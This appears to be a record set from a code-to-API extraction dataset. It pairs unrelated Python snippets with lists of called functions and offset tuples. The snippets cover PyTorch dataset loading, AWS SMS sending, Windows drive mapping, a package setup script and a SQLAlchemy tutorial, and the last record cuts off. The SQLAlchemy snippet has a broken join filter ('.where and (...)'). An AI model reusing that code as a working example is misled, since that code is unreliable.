# if psutil.Process(pid).name() == platform_lookup[self.players_sys]:
# aces_pid = pid
# p = psutil.Process(aces_pid)
# game_path_exe = pathlib.Path(p.exe())
# self.game_install_path = game_path_exe.parent.parent
# self.wargame_dir_known = True
# return self.game_install_path
#
# def get_game_version(self):
# if not self.wargame_dir_known:
# self.get_game_root_dir()
# if self.wargame_dir_known:
# version_file = self.game_install_path.joinpath('content/pkg_main.ver')
# with open(version_file, "r") as frv:
# return frv.read()
#
# def aces_language(self):
# path_config_blk = self.game_install_path.joinpath('config.blk')
# with open(path_config_blk) as f:
# lines = f.readlines()
# for line in lines:
# if line.startswith('language'):
# return line.split(':t=')[1]
|
[
"sys.stdout.write",
"getpass.getuser",
"pathlib.Path.home",
"pathlib.Path",
"sys.stdout.flush",
"os.path.join",
"psutil.process_iter",
"platform.architecture",
"loguru.logger.warning",
"socket.gethostname",
"requests.get",
"configparser.ConfigParser",
"cursor.cursor.hide",
"re.search",
"threading.Thread",
"time.sleep",
"platform.system",
"sys.exit",
"psutil.Process",
"cursor.cursor.show"
] |
[((878, 895), 'platform.system', 'platform.system', ([], {}), '()\n', (893, 895), False, 'import platform\n'), ((923, 940), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (938, 940), False, 'import getpass\n'), ((968, 988), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (986, 988), False, 'import socket\n'), ((1016, 1039), 'platform.architecture', 'platform.architecture', ([], {}), '()\n', (1037, 1039), False, 'import platform\n'), ((1059, 1086), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1084, 1086), False, 'import configparser\n'), ((12066, 12088), 'time.sleep', 'time.sleep', (['self.delay'], {}), '(self.delay)\n', (12076, 12088), False, 'import time\n'), ((2077, 2284), 'loguru.logger.warning', 'loguru.logger.warning', (['"""*nix users must manually enter the path to there WINE installed Tacview root + /Data/Terrain/Textures/ \nEX:\'/home/divine/Programs/Tacview (beta)/Data/Terrain/Textures/\'"""'], {}), '(\n """*nix users must manually enter the path to there WINE installed Tacview root + /Data/Terrain/Textures/ \nEX:\'/home/divine/Programs/Tacview (beta)/Data/Terrain/Textures/\'"""\n )\n', (2098, 2284), False, 'import loguru\n'), ((3331, 3348), 'platform.system', 'platform.system', ([], {}), '()\n', (3346, 3348), False, 'import platform\n'), ((6067, 6105), 'pathlib.Path', 'pathlib.Path', (["self.cfg_dir['war_path']"], {}), "(self.cfg_dir['war_path'])\n", (6079, 6105), False, 'import pathlib\n'), ((9437, 9526), 're.search', 're.search', (['"""(\\\\w+)\\\\[(\\\\d+)] successfully passed yuplay authorization"""', 'decoded', 're.M'], {}), "('(\\\\w+)\\\\[(\\\\d+)] successfully passed yuplay authorization',\n decoded, re.M)\n", (9446, 9526), False, 'import re\n'), ((11755, 11773), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (11771, 11773), False, 'import sys\n'), ((11786, 11808), 'time.sleep', 'time.sleep', (['self.delay'], {}), '(self.delay)\n', (11796, 11808), False, 'import time\n'), ((11821, 11843), 'sys.stdout.write', 'sys.stdout.write', (["'\\r'"], {}), "('\\r')\n", (11837, 11843), False, 'import sys\n'), ((11856, 11874), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (11872, 11874), False, 'import sys\n'), ((1554, 1573), 'pathlib.Path.home', 'pathlib.Path.home', ([], {}), '()\n', (1571, 1573), False, 'import pathlib\n'), ((2479, 2550), 'os.path.join', 'os.path.join', (["os.environ['APPDATA']", '"""Tacview\\\\Data\\\\Terrain\\\\Textures"""'], {}), "(os.environ['APPDATA'], 'Tacview\\\\Data\\\\Terrain\\\\Textures')\n", (2491, 2550), False, 'import os\n'), ((2586, 2605), 'pathlib.Path.home', 'pathlib.Path.home', ([], {}), '()\n', (2603, 2605), False, 'import pathlib\n'), ((2951, 2988), 'pathlib.Path', 'pathlib.Path', (['self.user_settings_file'], {}), '(self.user_settings_file)\n', (2963, 2988), False, 'import pathlib\n'), ((6302, 6315), 'cursor.cursor.hide', 'cursor.hide', ([], {}), '()\n', (6313, 6315), False, 'from cursor import cursor\n'), ((11934, 11976), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.spinner_task'}), '(target=self.spinner_task)\n', (11950, 11976), False, 'import threading\n'), ((3230, 3267), 'pathlib.Path', 'pathlib.Path', (['self.game_settings_root'], {}), '(self.game_settings_root)\n', (3242, 3267), False, 'import pathlib\n'), ((7009, 7022), 'cursor.cursor.show', 'cursor.show', ([], {}), '()\n', (7020, 7022), False, 'from cursor import cursor\n'), ((7039, 7049), 'sys.exit', 'sys.exit', ([], {}), '()\n', (7047, 7049), False, 'import sys\n'), ((10738, 10782), 'requests.get', 'requests.get', (['f"""{self.CHAT}?lastId={lastId}"""'], {}), "(f'{self.CHAT}?lastId={lastId}')\n", (10750, 10782), False, 'import requests\n'), ((6579, 6600), 'psutil.process_iter', 'psutil.process_iter', ([], {}), '()\n', (6598, 6600), False, 'import psutil\n'), ((6939, 6954), 'time.sleep', 'time.sleep', (['(0.9)'], {}), '(0.9)\n', (6949, 6954), False, 'import time\n'), ((6705, 6732), 'psutil.Process', 'psutil.Process', (['pid_list[0]'], {}), '(pid_list[0])\n', (6719, 6732), False, 'import psutil\n')]
|
"""
Modified version of the PyTorch DatasetFolder class to make custom dataloading possible
"""
import os
import os.path
from torchvision.datasets import VisionDataset
def has_file_allowed_extension(filename, extensions):
"""Checks if a file is an allowed extension.
Args:
filename (string): path to a file
extensions (tuple of strings): extensions to consider (lowercase)
Returns:
bool: True if the filename ends with one of given extensions
"""
return filename.lower().endswith(extensions)
def default_pretransform(sample, values):
"""Returns the image sample without transforming it at all
Args:
sample: Loaded image data
values: Tuple such that the 1th arguement is the target (defined by default)
Returns:
var: The loaded sample image
int: Value representing the image class (label for data)
"""
target = values[1]
return sample, target
def make_dataset(
directory,
class_to_idx,
extensions=None,
is_valid_file=None,
instance="train",
index=None,
train_test_val_instances=None,
):
"""Makes the actual dataset
Args:
directory (string): Root directory path.
class_to_idx (dict): Dict which maps classes to index values
extensions (tuple[string]): A list of allowed extensions. both extensions and is_valid_file should not be passed.
is_valid_file (callable, optional): A function that takes path of a file and check if the file is a valid file (used to check of corrupt files) both extensions and is_valid_file should not be passed.
instance (str): String signifying data segment (train, test, val)
index (dict): Index file dict data
train_test_val_instances (callable, optional): Returns custom breakup for train, test, val data
Returns:
list: List of PyTorch instance data to be loaded
"""
directory = os.path.expanduser(directory)
both_none = extensions is None and is_valid_file is None
both_something = extensions is not None and is_valid_file is not None
if both_none or both_something:
raise ValueError(
"Both extensions and is_valid_file cannot be None or not None at the same time"
)
if extensions is not None:
def is_valid_file(x):
return has_file_allowed_extension(x, extensions)
train, test, val = train_test_val_instances(
directory, class_to_idx, index, is_valid_file
)
return train if instance == "train" else test if instance == "test" else val
class DatasetFolder(VisionDataset):
"""A generic data loader ::
Args:
root (string): Root directory path.
loader (callable): A function to load a sample given its path.
extensions (tuple[string]): A list of allowed extensions.
both extensions and is_valid_file should not be passed.
transform (callable, optional): A function/transform that takes in
a sample and returns a transformed version.
E.g, ``transforms.RandomCrop`` for images.
target_transform (callable, optional): A function/transform that takes
in the target and transforms it.
is_valid_file (callable, optional): A function that takes path of a file
and check if the file is a valid file (used to check of corrupt files)
both extensions and is_valid_file should not be passed.
instance (sting, optional): Either 'train' 'test' or 'val' whether or not you want the train test or val split
index (dict[string:list[string]], optional): A dictionary that maps each class to a list of the image paths for that class along with whetever other data you need to make your dataset
this can really be whatever you want because it is only handled by train_test_val_instances.
train_test_val_instances (callable, optional): A function that takes:
a root directory,
a mapping of class names to indeces,
the index,
and is_valid_file
and returns a tuple of lists containing the instance data for each of train test and val,
the instance data in the list is a tuple and can have whatever structure you want as long as the image path is the first element
each of these tuples is processed by the pretransform
class_data (tuple, optional): the first element is a list of the classes, the second is a mapping of the classes to their indeces
pretransform (callable, optional): A function that takes the loaded image and any other relevant data for that image and returns a transformed version of that image
Attributes:
classes (list): List of the class names sorted alphabetically.
class_to_idx (dict): Dict with items (class_name, class_index).
pretransform (callable): returns a transformed image using data in the sample
class_data (tuple): (classes, class_to_idx)
samples (tuple): tuple of three (train test val) lists of (sample path, class_index, whatever else, ...) tuples
Unused: targets (list): The class_index value for each image in the dataset
"""
def __init__(
self,
root,
loader,
extensions,
transform,
target_transform,
is_valid_file,
instance,
index,
train_test_val_instances,
class_data,
pretransform,
):
super(DatasetFolder, self).__init__(
root, transform=transform, target_transform=target_transform
)
self.index = index
self.class_data = class_data
self.pretransform = (
default_pretransform if pretransform is None else pretransform
)
classes, class_to_idx = self._find_classes(self.root)
samples = make_dataset(
self.root,
class_to_idx,
extensions,
is_valid_file,
instance,
index,
train_test_val_instances,
)
self.loader = loader
self.extensions = extensions
self.classes = classes
self.class_to_idx = class_to_idx
self.samples = samples
self.targets = [s[1] for s in samples]
def _find_classes(self, root_dir):
"""
Finds the class folders in a dataset.
Args:
root_dir (string): Root directory path.
Returns:
tuple: (classes, class_to_idx) where classes are relative to (dir), and class_to_idx is a dictionary.
Ensures:
No class is a subdirectory of another.
"""
classes, class_to_idx = self.class_data(root_dir, self.index)
return classes, class_to_idx
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (sample, target) where target is class_index of the target class.
"""
# path, target, pt = self.samples[index]
values = self.samples[index]
path = values[0]
sample = self.loader(path)
sample, target = self.pretransform(sample, values)
if self.transform is not None:
sample = self.transform(sample)
if self.target_transform is not None:
target = self.target_transform(target)
return sample, target
def __len__(self):
return len(self.samples)
|
[
"os.path.expanduser"
] |
[((1932, 1961), 'os.path.expanduser', 'os.path.expanduser', (['directory'], {}), '(directory)\n', (1950, 1961), False, 'import os\n')]
|
import os
import sys
class AwsSmsProvider(object):
def __init__(self, **kargs):
if 'boto3' not in sys.modules:
import boto3
if 'region_name' not in kargs:
kargs['region_name'] = os.environ.get('AWS_SNS_REGION_NAME',
'us-east-1')
self.client = boto3.client('sns', **kargs)
# TODO: Add tags
def send(self, phone_number, message):
response = self.client.publish(
PhoneNumber=phone_number,
Message=message,
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
return True, response['MessageId']
else:
return False, RuntimeError()
def get_provider_sms(name='aws', **kargs):
provider = {
'aws': AwsSmsProvider(**kargs)
}
return provider[name]
|
[
"os.environ.get",
"boto3.client"
] |
[((348, 376), 'boto3.client', 'boto3.client', (['"""sns"""'], {}), "('sns', **kargs)\n", (360, 376), False, 'import boto3\n'), ((225, 275), 'os.environ.get', 'os.environ.get', (['"""AWS_SNS_REGION_NAME"""', '"""us-east-1"""'], {}), "('AWS_SNS_REGION_NAME', 'us-east-1')\n", (239, 275), False, 'import os\n')]
|
import hydra
from omegaconf import DictConfig, OmegaConf
@hydra.main(config_path="config", config_name="train")
def my_app(cfg: DictConfig) -> None:
print(OmegaConf.to_yaml(cfg))
if __name__ == "__main__":
my_app()
|
[
"omegaconf.OmegaConf.to_yaml",
"hydra.main"
] |
[((60, 113), 'hydra.main', 'hydra.main', ([], {'config_path': '"""config"""', 'config_name': '"""train"""'}), "(config_path='config', config_name='train')\n", (70, 113), False, 'import hydra\n'), ((161, 183), 'omegaconf.OmegaConf.to_yaml', 'OmegaConf.to_yaml', (['cfg'], {}), '(cfg)\n', (178, 183), False, 'from omegaconf import DictConfig, OmegaConf\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This module is part of the opsi PackageBuilder
see: https://forum.opsi.org/viewforum.php?f=22
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__author__ = '<NAME>'
__copyright__ = "Copyright 2013-2015, <NAME>"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
import ctypes
import ctypes.wintypes
class MapDrive(object):
"""
Maps windows network drives.
"""
class NETRESOURCEW(ctypes.Structure):
# https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/ns-winnetwk-netresourcew
_fields_ = [
("dwScope", ctypes.wintypes.DWORD),
("dwType", ctypes.wintypes.DWORD),
("dwDisplayType", ctypes.wintypes.DWORD),
("dwUsage", ctypes.wintypes.DWORD),
("lpLocalName", ctypes.wintypes.LPWSTR),
("lpRemoteName", ctypes.wintypes.LPWSTR),
("lpComment", ctypes.wintypes.LPWSTR),
("lpProvider", ctypes.wintypes.LPWSTR)
]
WNetAddConnection2 = ctypes.windll.MPR.WNetAddConnection2W # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetaddconnection2w
WNetAddConnection2.argtypes = [ctypes.POINTER(NETRESOURCEW), ctypes.wintypes.LPCWSTR, ctypes.wintypes.LPCWSTR, ctypes.wintypes.BOOL]
WNetCancelConnection2 = ctypes.windll.MPR.WNetCancelConnection2W # https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetcancelconnection2w
WNetCancelConnection2.argtypes = [ctypes.wintypes.LPCWSTR, ctypes.wintypes.DWORD, ctypes.wintypes.BOOL]
RESOURCE_TYPE_DISK = 1
RESOURCE_USAGE_IGNORED = 0
FLAG_CONNECT_UPDATE_PROFILE = 1
@classmethod
def mapDrive(cls, name, path, username, password):
nr = cls.NETRESOURCEW()
nr.dwType = cls.RESOURCE_TYPE_DISK
nr.lpLocalName = name
nr.lpRemoteName = path
nr.lpProvider = None
flags = cls.FLAG_CONNECT_UPDATE_PROFILE
retVal = cls.WNetAddConnection2(ctypes.byref(nr), password, username, flags)
msg = ''
if retVal != 0:
msg = ctypes.FormatError(retVal)
return retVal, msg
@classmethod
def unMapDrive(cls, name):
retVal = cls.WNetCancelConnection2(name, cls.FLAG_CONNECT_UPDATE_PROFILE, False)
msg = ''
if retVal != 0:
msg = ctypes.FormatError(retVal)
return retVal, msg
if __name__=="__main__":
print( "MapDrive 1:", MapDrive.mapDrive(
"Y:",
"\\\\path\\to\\be\\mapped",
"username",
"password"
))
|
[
"ctypes.FormatError",
"ctypes.byref",
"ctypes.POINTER"
] |
[((2095, 2123), 'ctypes.POINTER', 'ctypes.POINTER', (['NETRESOURCEW'], {}), '(NETRESOURCEW)\n', (2109, 2123), False, 'import ctypes\n'), ((2894, 2910), 'ctypes.byref', 'ctypes.byref', (['nr'], {}), '(nr)\n', (2906, 2910), False, 'import ctypes\n'), ((2998, 3024), 'ctypes.FormatError', 'ctypes.FormatError', (['retVal'], {}), '(retVal)\n', (3016, 3024), False, 'import ctypes\n'), ((3249, 3275), 'ctypes.FormatError', 'ctypes.FormatError', (['retVal'], {}), '(retVal)\n', (3267, 3275), False, 'import ctypes\n')]
|
import matplotlib.pyplot as plt
import numpy as np
import copy
from zonesafe import *
from adaptevitesserelat import *
from trouvecible import *
orientation=0
orientationm1=0
N=720
lidar1=[]
lidar2=[]
rv=20
m=5
i=0
r1=50
r2=41
epsilon=0.15
alpha=15 #angle cone correction
v=100
deltat=0.1
rmax=1000
while i<N:
lidar1.append((i,r1))
i+=1
i=0
while i<N:
lidar2.append((i,r2))
i+=1
MMMR=zonesafe(lidar2,rv,m)
MMMRC=adaptevitesserelat (lidar1,lidar2,MMMR,alpha,v,deltat,rmax,orientation,orientationm1)
cible=trouvecible(MMMRC)
i=0
while i<len(MMMR):
plt.plot(MMMR[i][2], MMMR[i][3],"b:o")
plt.plot(MMMR[i][4], MMMR[i][5],"r:o")
plt.plot(MMMRC[i][4], MMMRC[i][5],"g:o")
i=i+1
plt.plot(cible[0],cible[1],"y:o")
plt.axis('equal')
plt.show()
#trouvecible testé avec succés
|
[
"matplotlib.pyplot.show",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.plot"
] |
[((748, 783), 'matplotlib.pyplot.plot', 'plt.plot', (['cible[0]', 'cible[1]', '"""y:o"""'], {}), "(cible[0], cible[1], 'y:o')\n", (756, 783), True, 'import matplotlib.pyplot as plt\n'), ((783, 800), 'matplotlib.pyplot.axis', 'plt.axis', (['"""equal"""'], {}), "('equal')\n", (791, 800), True, 'import matplotlib.pyplot as plt\n'), ((802, 812), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (810, 812), True, 'import matplotlib.pyplot as plt\n'), ((607, 646), 'matplotlib.pyplot.plot', 'plt.plot', (['MMMR[i][2]', 'MMMR[i][3]', '"""b:o"""'], {}), "(MMMR[i][2], MMMR[i][3], 'b:o')\n", (615, 646), True, 'import matplotlib.pyplot as plt\n'), ((651, 690), 'matplotlib.pyplot.plot', 'plt.plot', (['MMMR[i][4]', 'MMMR[i][5]', '"""r:o"""'], {}), "(MMMR[i][4], MMMR[i][5], 'r:o')\n", (659, 690), True, 'import matplotlib.pyplot as plt\n'), ((695, 736), 'matplotlib.pyplot.plot', 'plt.plot', (['MMMRC[i][4]', 'MMMRC[i][5]', '"""g:o"""'], {}), "(MMMRC[i][4], MMMRC[i][5], 'g:o')\n", (703, 736), True, 'import matplotlib.pyplot as plt\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from os.path import join as pjoin
import shutil
from setuptools import setup, find_packages
import distutils.cmd
import distutils.log
import subprocess
from os import path as P
try:
execfile
except NameError:
def execfile(fname, globs, locs=None):
locs = locs or globs
exec(compile(open(fname).read(), fname, "exec"), globs, locs)
HERE = P.dirname((P.abspath(__file__)))
version_ns = {}
execfile(P.join(HERE, 'cooka', '_version.py'), version_ns)
version = version_ns['__version__']
print("__version__=" + version)
with open(P.join(HERE, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
class BuildJSCommand(distutils.cmd.Command):
description = 'Build frontend that written by javascript'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
# 1. check files
frontend_home = pjoin(HERE, 'packages')
backend_assets = pjoin(HERE, 'cooka', 'assets')
if P.exists(backend_assets):
raise RuntimeError(f"Assets path {backend_assets} already exists")
# 2. install deps by yarn
yarn_executable = 'yarn'
self.announce("yarn install ", distutils.log.INFO)
subprocess.call([yarn_executable, 'install'], cwd=frontend_home)
# 3. build assets
self.announce("yarn build ", distutils.log.INFO)
subprocess.call([yarn_executable, 'build'], cwd=frontend_home)
# 4. copy to python package
frontend_dist = pjoin(frontend_home, 'dist')
shutil.copytree(frontend_dist, backend_assets)
if __name__ == '__main__':
setup(
name="cooka",
version=version,
description="A lightweight AutoML system.",
long_description=long_description,
long_description_content_type="text/markdown",
packages=find_packages(exclude=["test.*", "test"]),
author="DataCanvas Community",
author_email="<EMAIL>",
cmdclass={'buildjs': BuildJSCommand},
python_requires='>=3.6.*',
license='Apache License 2.0',
install_requires=[
'numpy',
'pandas',
'scikit-learn>=0.22.1',
'requests',
'SQLAlchemy>=1.3.18',
'tornado==6.0.4',
'jinja2',
'deeptables==0.1.13',
'hypergbm==0.2.2',
'traitlets',
],
# extras_require={
# 'notebook': [
# 'shap',
# 'jupyterlab',
# 'matplotlib'
# 'pyecharts'
# ]
# },
zip_safe=False,
platforms="Linux, Mac OS X",
classifiers=[
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: Apache Software License',
],
entry_points={
'console_scripts': [
'cooka = cooka.cli:main',
]
},
include_package_data=True,
package_data={
'cooka': ['core/train_template/*.jinja2', '*.template', 'assets/*', 'assets/static/*'], # can not inlcude a directory recursion
}
)
|
[
"os.path.abspath",
"os.path.exists",
"subprocess.call",
"shutil.copytree",
"os.path.join",
"setuptools.find_packages"
] |
[((422, 441), 'os.path.abspath', 'P.abspath', (['__file__'], {}), '(__file__)\n', (431, 441), True, 'from os import path as P\n'), ((470, 506), 'os.path.join', 'P.join', (['HERE', '"""cooka"""', '"""_version.py"""'], {}), "(HERE, 'cooka', '_version.py')\n", (476, 506), True, 'from os import path as P\n'), ((600, 625), 'os.path.join', 'P.join', (['HERE', '"""README.md"""'], {}), "(HERE, 'README.md')\n", (606, 625), True, 'from os import path as P\n'), ((978, 1001), 'os.path.join', 'pjoin', (['HERE', '"""packages"""'], {}), "(HERE, 'packages')\n", (983, 1001), True, 'from os.path import join as pjoin\n'), ((1027, 1057), 'os.path.join', 'pjoin', (['HERE', '"""cooka"""', '"""assets"""'], {}), "(HERE, 'cooka', 'assets')\n", (1032, 1057), True, 'from os.path import join as pjoin\n'), ((1069, 1093), 'os.path.exists', 'P.exists', (['backend_assets'], {}), '(backend_assets)\n', (1077, 1093), True, 'from os import path as P\n'), ((1309, 1373), 'subprocess.call', 'subprocess.call', (["[yarn_executable, 'install']"], {'cwd': 'frontend_home'}), "([yarn_executable, 'install'], cwd=frontend_home)\n", (1324, 1373), False, 'import subprocess\n'), ((1466, 1528), 'subprocess.call', 'subprocess.call', (["[yarn_executable, 'build']"], {'cwd': 'frontend_home'}), "([yarn_executable, 'build'], cwd=frontend_home)\n", (1481, 1528), False, 'import subprocess\n'), ((1591, 1619), 'os.path.join', 'pjoin', (['frontend_home', '"""dist"""'], {}), "(frontend_home, 'dist')\n", (1596, 1619), True, 'from os.path import join as pjoin\n'), ((1628, 1674), 'shutil.copytree', 'shutil.copytree', (['frontend_dist', 'backend_assets'], {}), '(frontend_dist, backend_assets)\n', (1643, 1674), False, 'import shutil\n'), ((1930, 1971), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['test.*', 'test']"}), "(exclude=['test.*', 'test'])\n", (1943, 1971), False, 'from setuptools import setup, find_packages\n')]
|
from sqlalchemy import select
from sqlalchemy.sql import func
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, MetaData, Table, Integer, String, \
Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union
from datetime import datetime
engine = create_engine('sqlite:///Sqlite-Data/sqlite3.db')
session = Session(bind=engine)
metadata = MetaData()
customers = Table('customers', metadata,
Column('id', Integer(), primary_key=True),
Column('first_name', String(100), nullable=False),
Column('last_name', String(100), nullable=False),
Column('username', String(50), nullable=False),
Column('email', String(200), nullable=False),
Column('address', String(200), nullable=False),
Column('town', String(50), nullable=False),
Column('created_on', DateTime(), default=datetime.now),
Column('updated_on', DateTime(), default=datetime.now, onupdate=datetime.now)
)
items = Table('items', metadata,
Column('id', Integer(), primary_key=True),
Column('name', String(200), nullable=False),
Column('cost_price', Numeric(10, 2), nullable=False),
Column('selling_price', Numeric(10, 2), nullable=False),
Column('quantity', Integer(), nullable=False),
CheckConstraint('quantity > 0', name='quantity_check')
)
orders = Table('orders', metadata,
Column('id', Integer(), primary_key=True),
Column('customer_id', ForeignKey('customers.id')),
Column('date_placed', DateTime(), default=datetime.now),
Column('date_shipped', DateTime())
)
order_lines = Table('order_lines', metadata,
Column('id', Integer(), primary_key=True),
Column('order_id', ForeignKey('orders.id')),
Column('item_id', ForeignKey('items.id')),
Column('quantity', Integer())
)
customers_list = [
{
"first_name": "John",
"last_name": "Lara",
"username": "johnlara",
"email": "<EMAIL>",
"address": "3073 Derek Drive",
"town": "Norfolk"
},
{
"first_name": "Sarah",
"last_name": "Tomlin",
"username": "sarahtomlin",
"email": "<EMAIL>",
"address": "3572 Poplar Avenue",
"town": "Norfolk"
},
{
"first_name": "Pablo",
"last_name": "Gibson",
"username": "pablogibson",
"email": "<EMAIL>",
"address": "3494 Murry Street",
"town": "Peterbrugh"
},
{
"first_name": "Pablo",
"last_name": "Lewis",
"username": "pablolewis",
"email": "<EMAIL>",
"address": "3282 Jerry Toth Drive",
"town": "Peterbrugh"
},
]
items_list = [
{
"name": "Chair",
"cost_price": 9.21,
"selling_price": 10.81,
"quantity": 5
},
{
"name": "Pen",
"cost_price": 3.45,
"selling_price": 4.51,
"quantity": 3
},
{
"name": "Headphone",
"cost_price": 15.52,
"selling_price": 16.81,
"quantity": 50
},
{
"name": "Travel Bag",
"cost_price": 20.1,
"selling_price": 24.21,
"quantity": 50
},
{
"name": "Keyboard",
"cost_price": 20.12,
"selling_price": 22.11,
"quantity": 50
},
{
"name": "Monitor",
"cost_price": 200.14,
"selling_price": 212.89,
"quantity": 50
},
{
"name": "Watch",
"cost_price": 100.58,
"selling_price": 104.41,
"quantity": 50
},
{
"name": "<NAME>",
"cost_price": 20.89,
"selling_price": 25.00,
"quantity": 50
},
]
order_list = [
{
"customer_id": 1
},
{
"customer_id": 1
}
]
order_line_list = [
{
"order_id": 1,
"item_id": 1,
"quantity": 5
},
{
"order_id": 1,
"item_id": 2,
"quantity": 2
},
{
"order_id": 1,
"item_id": 3,
"quantity": 1
},
{
"order_id": 2,
"item_id": 1,
"quantity": 5
},
{
"order_id": 2,
"item_id": 2,
"quantity": 5
},
]
engine.execute(items.insert(), items_list)
engine.execute(customers.insert(), customers_list)
engine.execute(orders.insert(), order_list)
engine.execute(order_lines.insert(), order_line_list)
metadata.create_all(engine)
# Selecting records
s = select([customers])
str(s)
r = engine.execute(s)
r.fetchall()
rs = engine.execute(s)
for row in rs:
print(row)
# Filtering records
s = select([items]).where(
items.c.cost_price > 20)
str(s)
rs = engine.execute(s)
r.fetchall()
for row in rs:
print(row)
s = select([items]). \
where(
~(items.c.quantity == 50) &
(items.c.cost_price < 20)
)
engine.execute(s).fetchall()
# Comparison operators
s = select([orders]).where(
orders.c.date_shipped == 'None')
str(s)
rs = engine.execute(s).fetchall()
for row in rs:
print(row)
# Ordering results
s = select([items]).where(
items.c.quantity > 10
).order_by(items.c.cost_price)
str(s)
rs = engine.execute(s).fetchall()
for row in rs:
print(row)
# Grouping results
c = [
func.count("*").label('count'),
customers.c.town
]
s = select(c).group_by(customers.c.town)
print(s)
engine.execute(s).fetchall()
# Joins
s = select([
orders.c.id.label('order_id'),
orders.c.date_placed,
order_lines.c.quantity,
items.c.name,
]).select_from(
orders.join(customers).join(order_lines).join(items)
).where and (customers.c.first_name == "John", customers.c.last_name == "Green",)
str(s)
# Deleting data
i = session.query(items).filter(items.name == 'Monitor') .one()
i
session.delete(i)
session.commit()
|
[
"sqlalchemy.MetaData",
"sqlalchemy.DateTime",
"sqlalchemy.sql.func.count",
"sqlalchemy.select",
"sqlalchemy.String",
"sqlalchemy.ForeignKey",
"sqlalchemy.orm.Session",
"sqlalchemy.CheckConstraint",
"sqlalchemy.Numeric",
"sqlalchemy.create_engine",
"sqlalchemy.Integer"
] |
[((300, 349), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///Sqlite-Data/sqlite3.db"""'], {}), "('sqlite:///Sqlite-Data/sqlite3.db')\n", (313, 349), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((360, 380), 'sqlalchemy.orm.Session', 'Session', ([], {'bind': 'engine'}), '(bind=engine)\n', (367, 380), False, 'from sqlalchemy.orm import Session\n'), ((392, 402), 'sqlalchemy.MetaData', 'MetaData', ([], {}), '()\n', (400, 402), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((4741, 4760), 'sqlalchemy.select', 'select', (['[customers]'], {}), '([customers])\n', (4747, 4760), False, 'from sqlalchemy import select\n'), ((1455, 1509), 'sqlalchemy.CheckConstraint', 'CheckConstraint', (['"""quantity > 0"""'], {'name': '"""quantity_check"""'}), "('quantity > 0', name='quantity_check')\n", (1470, 1509), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((476, 485), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (483, 485), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((545, 556), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (551, 556), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((613, 624), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (619, 624), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((680, 690), 'sqlalchemy.String', 'String', (['(50)'], {}), '(50)\n', (686, 690), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((743, 754), 'sqlalchemy.String', 'String', (['(200)'], {}), '(200)\n', (749, 754), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((809, 820), 'sqlalchemy.String', 'String', (['(200)'], {}), '(200)\n', (815, 